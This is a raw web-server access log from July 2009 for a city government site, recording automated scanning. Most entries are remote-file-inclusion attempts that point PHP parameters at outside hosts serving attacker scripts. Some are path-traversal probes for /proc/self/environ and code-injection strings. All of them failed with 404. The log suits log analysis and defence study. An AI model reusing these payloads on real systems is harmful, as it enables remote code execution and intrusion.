83.98.209.71 - - [01/Jul/2009:07:01:30 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:07:01:40 -0700] "GET /logs/access_081001.log%20%20/media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:07:01:40 -0700] "GET /media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:07:01:40 -0700] "GET /logs/media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:07:01:40 -0700] "GET /logs/access_080531.log%20%20/media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.228.191.194 - - [01/Jul/2009:07:02:40 -0700] "GET /logs/access_080330.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.228.191.194 - - [01/Jul/2009:07:02:45 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.174.63.122 - - [01/Jul/2009:07:04:21 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.174.63.122 - - [01/Jul/2009:07:04:21 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.174.63.122 - - [01/Jul/2009:07:04:21 -0700] "GET /logs/access_080330.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.174.63.122 - - [01/Jul/2009:07:04:21 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:07:04:51 -0700] "GET /logs/access_080330.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:07:05:11 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:07:05:11 -0700] "GET /logs/access_080330.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:07:05:11 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:07:05:11 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:07:05:40 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:07:05:40 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:07:05:40 -0700] "GET /logs/access_080330.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:07:05:40 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:07:06:43 -0700] "GET /logs/access_081001.log/media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:07:06:43 -0700] "GET /logs/access_080531.log/media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:07:07:41 -0700] "GET /logs/access_080330.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:07:07:41 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.206.120.187 - - [01/Jul/2009:07:08:01 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.206.120.187 - - [01/Jul/2009:07:08:01 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.206.120.187 - - [01/Jul/2009:07:08:02 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:07:09:18 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:07:09:18 -0700] "GET /logs/access_080330.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.206.123.139 - - [01/Jul/2009:07:09:21 -0700] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
211.206.123.139 - - [01/Jul/2009:07:09:21 -0700] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:07:09:58 -0700] "GET /media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:07:09:58 -0700] "GET /logs/media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:07:09:58 -0700] "GET /logs/access_081001.log%20%20/media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:07:10:00 -0700] "GET /logs/access_080531.log%20%20/media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:07:11:07 -0700] "GET /media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:07:11:07 -0700] "GET /logs/media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:07:11:07 -0700] "GET /logs/access_081001.log/media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:07:11:07 -0700] "GET /logs/access_080531.log/media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:07:11:36 -0700] "GET /logs/access_081001.log/media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:07:11:36 -0700] "GET /logs/access_080531.log/media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:07:13:42 -0700] "GET /logs/access_080531.log%20%20/media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:07:13:42 -0700] "GET /logs/access_081001.log%20%20/media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.206.120.187 - - [01/Jul/2009:07:15:29 -0700] "GET /logs/access_080330.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:07:16:34 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:07:16:34 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:07:16:34 -0700] "GET /logs/access_080531.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:07:16:40 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:07:16:41 -0700] "GET /logs/access_080531.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:07:16:41 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:07:16:58 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:07:16:58 -0700] "GET /logs/access_080531.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:07:16:58 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.94.194.231 - - [01/Jul/2009:07:17:34 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "cityofarkadelphia.com"
219.94.194.231 - - [01/Jul/2009:07:17:34 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "cityofarkadelphia.com"
219.94.194.231 - - [01/Jul/2009:07:17:35 -0700] "GET /errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "cityofarkadelphia.com"
219.94.194.231 - - [01/Jul/2009:07:17:35 -0700] "GET /logs/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "cityofarkadelphia.com"
219.94.194.231 - - [01/Jul/2009:07:17:35 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
219.94.194.231 - - [01/Jul/2009:07:17:35 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
219.94.194.231 - - [01/Jul/2009:07:17:35 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
219.94.194.231 - - [01/Jul/2009:07:17:35 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
211.206.123.139 - - [01/Jul/2009:07:20:11 -0700] "GET /logs/access.log//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
211.206.123.139 - - [01/Jul/2009:07:20:11 -0700] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
211.206.123.139 - - [01/Jul/2009:07:20:12 -0700] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
211.206.123.139 - - [01/Jul/2009:07:20:12 -0700] "GET /logs/access.log//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
211.206.123.139 - - [01/Jul/2009:07:20:13 -0700] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
211.206.123.139 - - [01/Jul/2009:07:20:13 -0700] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
211.206.123.139 - - [01/Jul/2009:07:28:01 -0700] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
211.206.123.139 - - [01/Jul/2009:07:28:01 -0700] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
195.149.74.81 - - [01/Jul/2009:07:29:47 -0700] "GET /logs/access_081001.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:07:30:43 -0700] "GET /logs/access_080531.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.86.175.194 - - [01/Jul/2009:07:37:41 -0700] "GET /logs/access.log//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.86.175.194 - - [01/Jul/2009:07:37:46 -0700] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.86.175.194 - - [01/Jul/2009:07:37:51 -0700] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
199.120.90.222 - - [01/Jul/2009:07:40:29 -0700] "GET /logs/access_080330.log//voir.php?inc=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.149.74.81 - - [01/Jul/2009:07:40:30 -0700] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
93.188.112.35 - - [01/Jul/2009:07:40:42 -0700] "GET /index.php?dir=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.188.112.35 - - [01/Jul/2009:07:40:42 -0700] "GET /logs/access.log/index.php?dir=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.188.112.35 - - [01/Jul/2009:07:40:42 -0700] "GET /logs/index.php?dir=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.22.227.138 - - [01/Jul/2009:07:42:00 -0700] "GET /logs/access_081001.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
217.22.227.138 - - [01/Jul/2009:07:42:00 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
217.22.227.138 - - [01/Jul/2009:07:42:01 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
87.106.245.84 - - [01/Jul/2009:07:43:29 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://www.angelcitytrading.com/css/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "cityofarkadelphia.com"
87.106.245.84 - - [01/Jul/2009:07:43:29 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://www.angelcitytrading.com/css/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "cityofarkadelphia.com"
122.153.28.140 - - [01/Jul/2009:07:45:22 -0700] "GET /logs/access_080531.log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.153.28.140 - - [01/Jul/2009:07:45:22 -0700] "GET /webcalendar//tools/send_reminders.php?noSet=0&includedir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.153.28.140 - - [01/Jul/2009:07:45:22 -0700] "GET /logs/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.153.28.140 - - [01/Jul/2009:07:45:51 -0700] "GET /logs/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.153.28.140 - - [01/Jul/2009:07:45:51 -0700] "GET /logs/access_080531.log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.153.28.140 - - [01/Jul/2009:07:45:51 -0700] "GET /webcalendar//tools/send_reminders.php?noSet=0&includedir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:07:46:18 -0700] "GET /logs/access_080531.log/media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.153.28.140 - - [01/Jul/2009:07:47:10 -0700] "GET /logs/access_080330.log%20%20/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.153.28.140 - - [01/Jul/2009:07:47:11 -0700] "GET /logs/access_080330.log%20%20/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.153.28.140 - - [01/Jul/2009:07:47:13 -0700] "GET /logs/access_080330.log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.86.175.194 - - [01/Jul/2009:07:47:14 -0700] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
122.153.28.140 - - [01/Jul/2009:07:47:14 -0700] "GET /logs/access_080330.log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
199.120.90.222 - - [01/Jul/2009:07:48:06 -0700] "GET /logs/access_080330.log//voir.php?inc=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.153.28.140 - - [01/Jul/2009:07:50:20 -0700] "GET /logs/access_080531.log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.153.28.140 - - [01/Jul/2009:07:50:20 -0700] "GET /webcalendar//tools/send_reminders.php?noSet=0&includedir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.153.28.140 - - [01/Jul/2009:07:50:20 -0700] "GET /logs/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.153.28.140 - - [01/Jul/2009:07:51:37 -0700] "GET /logs/access_080330.log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.153.28.140 - - [01/Jul/2009:07:51:56 -0700] "GET /logs/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.153.28.140 - - [01/Jul/2009:07:51:56 -0700] "GET /logs/access_080531.log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.153.28.140 - - [01/Jul/2009:07:51:56 -0700] "GET /webcalendar//tools/send_reminders.php?noSet=0&includedir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.153.28.140 - - [01/Jul/2009:07:53:02 -0700] "GET /logs/access_080330.log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
